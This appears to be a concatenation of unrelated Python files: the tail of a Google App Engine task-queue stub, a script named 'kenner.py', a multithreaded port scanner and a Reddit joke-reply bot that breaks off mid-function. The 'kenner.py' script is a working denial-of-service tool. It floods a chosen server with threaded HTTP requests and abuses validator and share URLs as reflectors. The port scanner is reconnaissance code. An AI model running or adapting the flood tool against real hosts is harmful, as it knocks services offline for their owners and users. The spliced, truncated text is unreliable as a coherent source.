self._queues[None], _TaskExecutor(default_http_server),
retry_seconds=task_retry_seconds)
def StartBackgroundExecution(self):
"""Start automatic task execution."""
if not self._started and self._auto_task_running:
task_scheduler_thread = threading.Thread(
target=self._task_scheduler.MainLoop)
task_scheduler_thread.setDaemon(True)
task_scheduler_thread.start()
self._started = True
def Shutdown(self):
"""Requests the task scheduler to shutdown."""
self._task_scheduler.Shutdown()
def _ParseQueueYaml(self):
"""Loads the queue.yaml file and parses it.
Returns:
None if queue.yaml doesn't exist, otherwise a queueinfo.QueueEntry object
populated from the queue.yaml.
"""
if hasattr(self, 'queue_yaml_parser'):
return self.queue_yaml_parser(self._root_path)
if self._root_path is None:
return None
for queueyaml in ('queue.yaml', 'queue.yml'):
try:
fh = open(os.path.join(self._root_path, queueyaml), 'r')
except IOError:
continue
try:
queue_info = queueinfo.LoadSingleQueue(fh)
return queue_info
finally:
fh.close()
return None
def _UpdateNextEventTime(self, callback_time):
"""Enqueue a task to be automatically scheduled.
Note: If auto task running is disabled, this function is a no-op.
Args:
callback_time: The earliest time this task may be run, in seconds since
the epoch.
"""
self._task_scheduler.UpdateNextEventTime(callback_time)
def _GetGroup(self, app_id=None):
"""Get the _Group instance for app_id, creating a new one if needed.
Args:
app_id: The app id in question. Note: This field is not validated.
"""
if app_id not in self._queues:
self._queues[app_id] = _Group(
app_id=app_id, _all_queues_valid=self._all_queues_valid,
_testing_validate_state=self._testing_validate_state)
return self._queues[app_id]
def _Dynamic_Add(self, request, response):
"""Add a single task to a queue.
This method is a wrapper around the BulkAdd RPC request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueAddResponse. See
taskqueue_service.proto.
"""
bulk_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
bulk_response = taskqueue_service_pb.TaskQueueBulkAddResponse()
bulk_request.add_add_request().CopyFrom(request)
self._Dynamic_BulkAdd(bulk_request, bulk_response)
assert bulk_response.taskresult_size() == 1
result = bulk_response.taskresult(0).result()
if result != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(result)
elif bulk_response.taskresult(0).has_chosen_task_name():
response.set_chosen_task_name(
bulk_response.taskresult(0).chosen_task_name())
def _Dynamic_BulkAdd(self, request, response):
"""Add many tasks to a queue using a single request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
assert request.add_request_size(), 'taskqueue should prevent empty requests'
self._GetGroup(_GetAppId(request.add_request(0))).BulkAdd_Rpc(
request, response)
def GetQueues(self):
"""Gets all the application's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12}, ...]
The list of queues always includes the default queue.
"""
return self._GetGroup().GetQueuesAsDicts()
def GetTasks(self, queue_name):
"""Gets a queue's tasks.
Args:
queue_name: Queue's name to return tasks for.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
('X-AppEngine-TaskRetryCount': '0'),
('X-AppEngine-Development-Payload': '1'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
KeyError: An invalid queue name was specified.
"""
return self._GetGroup().GetQueue(queue_name).GetTasksAsDicts()
def DeleteTask(self, queue_name, task_name):
"""Deletes a task from a queue, without leaving a tombstone.
Args:
queue_name: the name of the queue to delete the task from.
task_name: the name of the task to delete.
"""
if self._GetGroup().HasQueue(queue_name):
queue = self._GetGroup().GetQueue(queue_name)
queue.Delete(task_name)
queue.task_name_archive.discard(task_name)
def FlushQueue(self, queue_name):
"""Removes all tasks from a queue, without leaving tombstones.
Args:
queue_name: the name of the queue to remove tasks from.
"""
if self._GetGroup().HasQueue(queue_name):
self._GetGroup().GetQueue(queue_name).PurgeQueue()
self._GetGroup().GetQueue(queue_name).task_name_archive.clear()
def _Dynamic_UpdateQueue(self, request, unused_response):
"""Local implementation of the UpdateQueue RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
unused_response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
Not used.
"""
self._GetGroup(_GetAppId(request)).UpdateQueue_Rpc(request, unused_response)
def _Dynamic_FetchQueues(self, request, response):
"""Local implementation of the FetchQueues RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueues_Rpc(request, response)
def _Dynamic_FetchQueueStats(self, request, response):
"""Local 'random' implementation of the TaskQueueService.FetchQueueStats.
This implementation loads some stats from the task store, the rest with
random numbers.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueueStats_Rpc(request, response)
def _Dynamic_QueryTasks(self, request, response):
"""Local implementation of the TaskQueueService.QueryTasks RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._GetGroup(_GetAppId(request)).QueryTasks_Rpc(request, response)
def _Dynamic_FetchTask(self, request, response):
"""Local implementation of the TaskQueueService.FetchTask RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._GetGroup(_GetAppId(request)).FetchTask_Rpc(request, response)
def _Dynamic_Delete(self, request, response):
"""Local delete implementation of TaskQueueService.Delete.
Deletes tasks from the task store. A 1/20 chance of a transient error.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._GetGroup(_GetAppId(request)).Delete_Rpc(request, response)
def _Dynamic_ForceRun(self, request, response):
"""Local force run implementation of TaskQueueService.ForceRun.
Forces running of a task in a queue. This is a no-op here.
This will fail randomly for testing.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueForceRunRequest.
response: A taskqueue_service_pb.TaskQueueForceRunResponse.
"""
if _GetAppId(request) is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if random.random() <= 0.05:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
elif random.random() <= 0.052:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR)
else:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
def _Dynamic_DeleteQueue(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).DeleteQueue_Rpc(request, response)
def _Dynamic_PauseQueue(self, request, response):
"""Local pause implementation of TaskQueueService.PauseQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).PauseQueue_Rpc(request, response)
def _Dynamic_PurgeQueue(self, request, response):
"""Local purge implementation of TaskQueueService.PurgeQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._GetGroup(_GetAppId(request)).PurgeQueue_Rpc(request, response)
def _Dynamic_DeleteGroup(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteGroup.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteGroupRequest.
response: A taskqueue_service_pb.TaskQueueDeleteGroupResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if app_id in self._queues:
del self._queues[app_id]
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
def _Dynamic_UpdateStorageLimit(self, request, response):
"""Local implementation of TaskQueueService.UpdateStorageLimit.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateStorageLimitRequest.
response: A taskqueue_service_pb.TaskQueueUpdateStorageLimitResponse.
"""
if _GetAppId(request) is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if request.limit() < 0 or request.limit() > 1000 * (1024 ** 4):
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
response.set_new_limit(request.limit())
def _Dynamic_QueryAndOwnTasks(self, request, response):
"""Local implementation of TaskQueueService.QueryAndOwnTasks.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().QueryAndOwnTasks_Rpc(request, response)
def _Dynamic_ModifyTaskLease(self, request, response):
"""Local implementation of TaskQueueService.ModifyTaskLease.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().ModifyTaskLease_Rpc(request, response)
def get_filtered_tasks(self, url=None, name=None, queue_names=None):
"""Get the tasks in the task queue with filters.
Args:
url: A URL that all returned tasks should point at.
name: The name of all returned tasks.
queue_names: A list of queue names to retrieve tasks from. If left blank
this will get default to all queues available.
Returns:
A list of taskqueue.Task objects.
"""
all_queue_names = [queue['name'] for queue in self.GetQueues()]
if isinstance(queue_names, basestring):
queue_names = [queue_names]
if queue_names is None:
queue_names = all_queue_names
task_dicts = []
for queue_name in queue_names:
if queue_name in all_queue_names:
for task in self.GetTasks(queue_name):
if url is not None and task['url'] != url:
continue
if name is not None and task['name'] != name:
continue
task_dicts.append(task)
tasks = []
for task in task_dicts:
decoded_body = base64.b64decode(task['body'])
if decoded_body:
task['params'] = cgi.parse_qs(decoded_body)
task['eta'] = datetime.datetime.strptime(task['eta'], '%Y/%m/%d %H:%M:%S')
task_object = taskqueue.Task(name=task['name'], method=task['method'],
url=task['url'], headers=task['headers'],
params=task.get('params'), eta=task['eta'])
tasks.append(task_object)
return tasks
|
kenner.py
|
#
#88 a8P
#88 ,88'
#88 ,88"
#88,d88' ,adPPYba, 8b,dPPYba, 8b,dPPYba, ,adPPYba, 8b,dPPYba,
#8888"88, a8P_____88 88P' `"8a 88P' `"8a a8P_____88 88P' "Y8
#88P Y8b 8PP""""""" 88 88 88 88 8PP""""""" 88
#88 "88, "8b, ,aa 88 88 88 88 "8b, ,aa 88
#88 Y8b `"Ybbd8"' 88 88 88 88 `"Ybbd8"' 88
#
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbotlar kennerliyor...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--paketler yollandi! kennerleniyor--> \033[0m")
else:
s.shutdown(1)
print("\033[91mKENNERLENDI\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mBaglanti yok galiba kennerlendi\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m 88 a8P
88 ,88'
88 ,88"
88,d88' ,adPPYba, 8b,dPPYba, 8b,dPPYba, ,adPPYba, 8b,dPPYba,
8888"88, a8P_____88 88P' `"8a 88P' `"8a a8P_____88 88P' "Y8
88P Y8b 8PP""""""" 88 88 88 88 8PP""""""" 88
88 "88, "8b, ,aa 88 88 88 88 "8b, ,aa 88
88 Y8b `"Ybbd8"' 88 88 88 88 `"Ybbd8"' 88 \n
usage : python3 kenner.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mBekleyin...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91msunucu ip adresini kontrol et portunuda\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
T1046.py
|
from socket import *
from threading import Thread
import argparse
def checking_port(host, port_number):
s = socket(AF_INET, SOCK_STREAM)
try:
s.connect((host, int(port_number)))
print(f'{host}/{port} - open')
except:
pass
arguments = argparse.ArgumentParser()
arguments.add_argument('-i', required=True, action='store', dest='ip', help='IP using to scan ports')
values = arguments.parse_args()
print('\nOpen ports:')
for port in range(0, 65536):
t = Thread(target=checking_port, args=(values.ip, port))
t.start()
|
chickenbot.py
|
import praw
import pickle
import re
from prawcore.exceptions import Forbidden, PrawcoreException
from praw.exceptions import ClientException, RedditAPIException
from traceback import format_exc
from collections import deque
from random import shuffle
from time import sleep
from datetime import datetime, timedelta
from os import get_terminal_size
from pathlib import Path
from threading import Thread
from signal import signal, SIGINT
from urllib.parse import quote
class ChickenBot():
def __init__(self,
subreddit = "all",
question = "why did the chicken cross the road",
wait_interval = 3600, # Time in seconds for searching new posts
user_cooldown = 86400, # Time in seconds for when an user can get a new reply from the bot
user_refresh = 1800, # Minimum time in seconds for cleaning the replied users list
message_wait = 900, # Minimum time in seconds for checking new private messages
counter_start = 0, # The starting value of the bot replies counter
):
"""The bot works by searching each 1 hour (default) for the question in the title
of posts, and then checking if the post author did not get a reply from the bot in
the last 24 hours. If those checks have passed, the bot replies with a randonly
selected answer.
The search is made this way, instead of constantly checking for a stream of new
submissions, because the default question do not come that often (2 to 3 times a
day, on average). Thus continuously checking for all new posts would be a waste of
resources (especially bandwidth)."""
# Open Reddit instance
print("Starting up ChickenBot...")
print("Logging in Reddit... ", end="", flush=True)
self.reddit = praw.Reddit()
self.reddit.validate_on_submit = True
self.subreddit = self.reddit.subreddit(subreddit)
print("Finished")
# Question
self.question = question.lower()
self.query = f"(title:{self.question})"
self.previous_post = "" # Last post which had the question on the title
self.previous_reply_time = datetime.utcnow() # Time of the latest bot reply
self.wait = wait_interval # Time to wait between checks for new posts
# Get latest users who the bot replied to
print("Looking for the latest replied users... ", end="", flush=True)
self.replied_users = dict() # Dictionary of users and the time of the last bot reply
self.user_cooldown = timedelta(seconds=user_cooldown) # How long to wait before user can get another reply (default: 1 day)
my_comments = self.reddit.user.me().comments.new() # Most recent comments of the bot
self.user_refresh = timedelta(seconds=user_refresh) # Minimum time to refresh the replied users list
for count, comment in enumerate(my_comments):
current_time = datetime.utcnow() # Time now
comment_time = datetime.fromtimestamp(comment.created_utc) # Time of the bot reply
comment_age = current_time - comment_time # Difference between the two times
if count == 0:
self.previous_post = comment.submission.name # Latest submission replied by bot
self.previous_reply_time = datetime.fromtimestamp( # Time of the latest bot reply
comment.created_utc
)
if comment_age < self.user_cooldown:
# Store the user ID and comment time if the bot reply was made before the cooldown period
replied_user = comment.submission.author.id
self.replied_users.update({replied_user: comment_time})
self.last_refresh = datetime.utcnow() # Store the time that the replied users list was built
print("Finished")
# Load blacklist of subreddits
print("Loading subreddits blacklist... ", end="", flush=True)
self.blacklist = set()
try:
with open("blacklist.txt", "r") as blacklist_file:
for line in blacklist_file:
self.blacklist.add(line.strip()) # Strip the text from the line break and spaces at both ends
print("Finished")
except FileNotFoundError:
print("No blacklist found")
# Load responses
print("Loading responses list... ", end="", flush=True)
self.temp_file = Path("temp.bin") # Temporary file for the responses in the queue
if self.temp_file.exists():
# Load the responses from the temporary file, if one exists
with open(self.temp_file, "rb") as temp:
self.responses = pickle.load(temp)
else:
# If not, then build the response queue from scratch
self.responses = deque()
self.refresh_responses()
print("Finished")
# Update the counter for the amount replies the bot has made so far
print("Updating bot replies counter... ", end="", flush=True)
self.reply_counter = counter_start
self.reply_counter_session = 0 # Replies during the current bot session
self.log_file_name = "chickenbot_log.txt"
try:
with open(self.log_file_name, "r") as log_file:
# Count the lines on the log file
for line in log_file:
if line.strip(): # Do not count blank lines
self.reply_counter += 1
except FileNotFoundError:
pass
print("Finished")
# Interval to check for private messages
self.message_wait = message_wait
self.running = True # Indicate to the threads that the bot is running
separator = "".ljust(get_terminal_size().columns - 1, "-")
print(f"ChickenBot has started! Bot is now running.\n{separator}")
def refresh_responses(self):
"""Once all responses have been used, this method is called for
rebuilding the responses queue"""
# Read the responses from the file and append them to the queue
with open("responses.txt", "r", encoding="utf-8") as responses_file:
for line in responses_file:
self.responses.append(line.strip())
# Randomize the order of the responses
shuffle(self.responses)
# Create the temporary file for the responses queue
self.save_temp()
def save_temp(self):
"""Saves a temporary file for the responses queue.
This allows the bot, when restarted, to continue from where it stopped."""
# Create the temporary file with the responses queue
with open(self.temp_file, "wb") as temp:
pickle.dump(self.responses, temp)
def submission_testing(self, submission):
"""Checks whether a submission passes the checks for getting a reply.
All checks must pass: post made after bot's previous reply, question in
the title, subreddit not on blacklist, author didn't get a ChickenBot's
reply within the last day (default)."""
# Was the submission made after the last bot reply?
post_time = datetime.fromtimestamp(submission.created_utc)
if post_time < self.previous_reply_time:
return False
# Is the question on the title?
title = submission.title.lower()
if self.question not in title:
return False
# Is the post made on a non-blacklisted subreddit?
subreddit_id = submission.subreddit.name
if subreddit_id in self.blacklist:
return False
# The author must not have gotten a reply from this bot recently (default: less than 24 hours ago)
self.refresh_authors() # Update the recently replied users list (default: less than 1 day)
user_id = submission.author.id # Get the ID of the current replied user
if user_id in self.replied_users: # If the user is on the recent list
reply_time = self.replied_users[user_id] # Last time when the user gor a reply from this bot
reply_age = datetime.utcnow() - reply_time # How long has passed since then
if reply_age < self.user_cooldown: # Whether the comment age is smaller than the cooldown period
return False
# Return True when all checks passed
return True
def refresh_authors(self):
"""Remove from the replied authors dictionary those authors who got the last
reply for longer than the cooldown period (default 1 day).
The check is run each 30 minutes (by default)."""
# Check if the minimum refresh period has passed
last_refresh_age = datetime.utcnow() - self.last_refresh
# Exit the function if the minimum refresh time has not passed (default: 30 minutes)
if last_refresh_age < self.user_refresh:
return
# Loop through the replied users dictionary
authors_to_remove = set()
for user_id, time in self.replied_users.items():
# How long ago the user got a reply from this bot
reply_age = datetime.utcnow() - time
# Whether that reply for longer than the cooldown period (default: 1 day)
if reply_age >= self.user_cooldown:
authors_to_remove.add(user_id) # Queue to remove the user from the dictionary if the cooldown period has passed
"""NOTE
Deleting a dictionary item during the its own iteration throws a RuntimeError.
So instead I am storing their ids to remove from the dict after the loop.
"""
# Remove the authors whose cooldown period expired
if authors_to_remove:
for user_id in authors_to_remove:
del self.replied_users[user_id]
def make_reply(self, submission):
"""The bot gets a response from the queue and post a reply to the post.
Once all responses have been used, the queue is rebuilt. This way the
bot only repeats the same response after all others have been used
at least once."""
# Whether the response queue is empty
if not self.responses:
# Reload the responses list when all responses have been used
self.refresh_responses()
# Get and remove a response from the queue
response = self.responses.pop().replace("
", "\n\n")
self.save_temp()
# Build the reply text
header = ">Why did the chicken cross the road?\n\n"
footer = f"\n\n---\n\n^(This is an automatic comment made by a bot, who has answered so far to {self.reply_counter+1} doubts concerning gallinaceous roadgoing birds.)"
reply_text = f"{header}{response}{footer}"
# Posting the reply
try:
#print(f"{submission.title}\n{reply_text}\n----------\n")
my_comment = submission.reply(reply_text) # Submit the reply
self.reply_counter += 1 # Increase the reply counter
self.reply_counter_session += 1
self.has_replied = True # Flag that the bot has replied on the current cycle
# Add user to the replied users dictionary
self.replied_users[submission.author.id] = datetime.utcnow()
# Log to file the bot comment
with open(self.log_file_name, "a", encoding="utf-8") as log_file:
current_time = str(datetime.utcnow())[:19] # Current date and time as string (The [:19] slice strips the fractional part of the seconds)
username = submission.author.name # Get the post author's username
link = my_comment.permalink # Reddit link to the bot comment
log_text = f"{current_time}\tu/{username}\t{link}\n" # Text to be written on the log file
log_file.write(log_text) # Write the log file
print("OK:", log_text, end="") # Print the logged text to the terminal
# Generate link so the original poster can delete the comment
# (the 'urllib.parse.quote()' function escapes special characters and spaces)
message_subject = quote("Removal of ChickenBot's comment", safe="")
message_body = quote(f"Please remove {link}\n\n[do not edit the first line]", safe="")
removal_link = f"/message/compose/?to=u%2FChickenRoad_Bot&subject={message_subject}&message={message_body}"
# Edit the comment to append the removal link
edited_comment = my_comment.body + f"^( If you are the thread's author, you can )[^(click here)]({removal_link})^( to delete this comment.)"
sleep(5)
my_comment.edit(edited_comment)
except Forbidden as error: # If the bot didn't have permission to reply to the post
# Log the forbiden post to file
with open("forbiden_log.txt", "a", encoding="utf-8") as log_file:
current_time = str(datetime.utcnow())[:19] # Current date and time
username = submission.author.name # Get the post author's username
link = submission.permalink # Reddit link to the submission
log_text = f"{current_time}\tu/{username}\t{link}\t{error}\n" # Text to be written on the log file
log_file.write(log_text) # Write the log file
print("FORBIDEN:", log_text, end="") # Print the logged text to the terminal
except PrawcoreException as error: # If some other problem happened
current_time = str(datetime.utcnow())[:19]
log_text = f"{current_time}\tu/{username}\t{link}\t{error}\n"
print("Failed:", log_text, end="")
with open("forbiden_log.txt", "a", encoding="utf-8") as log_file:
log_file.write(log_text)
my_exception = format_exc()
my_date = current_time + "\n\n"
with open("error_log.txt", "a", encoding="utf-8") as error_log:
error_log.write(my_date)
error_log.write(my_exception)
error_log.write("\n\n---------------\n")
def check_submissions(self):
"""Look for submissions for replying to."""
while self.running:
# Track whether the bot has replied this cycle
self.has_replied = False
# Search for posts with the question made after the previous search
lookup = self.subreddit.search(
self.query, # Search query for the question
sort="new", # Sorted by newest posts
# params={"before":self.previous_post}, # Made after the newest post found
)
# Loop through the found posts
try:
for count, submission in enumerate(lookup):
# Store the ID of the newest post
if count == 0:
self.previous_post = submission.name
# Check whether the post fits the criteria for getting a reply
if not self.submission_testing(submission):
continue
# Make a reply
self.make_reply(submission)
sleep(5)
# Connection to the Reddit server failed
except (PrawcoreException, RedditAPIException) as error:
current_time = str(datetime.utcnow())[:19]
print("Warning:", current_time, error)
my_exception = format_exc()
my_date = str(datetime.now())[:19] + "\n\n"
with open("error_log.txt", "a", encoding="utf-8") as error_log:
error_log.write(my_date)
error_log.write(my_exception)
error_log.write("\n\n---------------\n")
# Update the last reply time if the bot has replied this cycle
if self.has_replied:
self.previous_reply_time = datetime.utcnow()
# Wait for one hour (default) before searching again for posts
sleep(self.wait)
def private_messages(self):
"""Listens to the bot account's private chat, in order to process removal requests."""
# Regular expression to extract the comment ID from the message body
message_regex = re.compile(r"remove /r/.+?/comments/.+?/.+?/(\w+)")
# Bot's user ID
my_id = self.reddit.user.me().fullname
# Check for new private messages
while self.running:
try:
private_inbox = self.reddit.inbox.messages()
for message in private_inbox:
# Skip the message if it has already been read
if not message.new: continue
# Mark the message as "read"
message.mark_read()
# Get the author and the requested comment
message_author_id = message.author_fullname
message_author = self.reddit.redditor(fullname=message_author_id)
if message_author is None: continue
# Get the comment ID from the message
search = message_regex.search(message.body)
if search is None: continue
comment_id = search.group(1)
try:
# Get the paramentes of the comment's thread
comment = self.reddit.comment(comment_id)
post_id = comment.link_id.split("_")[1]
post = self.reddit.submission(post_id)
post_title = post.title
post_url = post.permalink
post_author_id = post.author_fullname
except (ClientException, AttributeError):
# If the comment was not found
if "remov" in message.subject:
message_author.message(
subject = "ChickenBot comment removal",
message = f"Sorry, the requested comment '{comment_id}' could not be found. Possibly it was already deleted."
)
continue
# Permanent link to the comment
comment_url = comment.permalink
# Verify the author and respond
if post_author_id == message_author_id:
# Delete comment if it was requested by the own author
# Check if the bot is the comment's author
if comment.author_fullname == my_id:
comment.delete()
message_author.message(
subject = "ChickenBot comment removed",
message = f"The bot has deleted [its comment]({comment_url}) from your post [{post_title}]({post_url}).\n\nSorry for any inconvenience that the bot might have caused."
)
# The bot won't post to this author's threads for the duration of their cooldown time
self.replied_users[post.author.id] = datetime.utcnow()
else:
message_author.message(
subject = "ChickenBot comment removal",
message = "Sorry, the bot can only delete comments made by itself."
)
else:
# Refuse to delete if it was someone else who requested
message_author.message(
subject = "ChickenBot comment",
message = f"Sorry, only the original poster u/{post.author.name} can request the removal of [my comment]({comment_url}) on the thread [{post_title}]({post_url})."
)
# Logs the error if something wrong happens while handling messages
# (probably Reddit was down or the user blocked the bot)
except (PrawcoreException, RedditAPIException) as error:
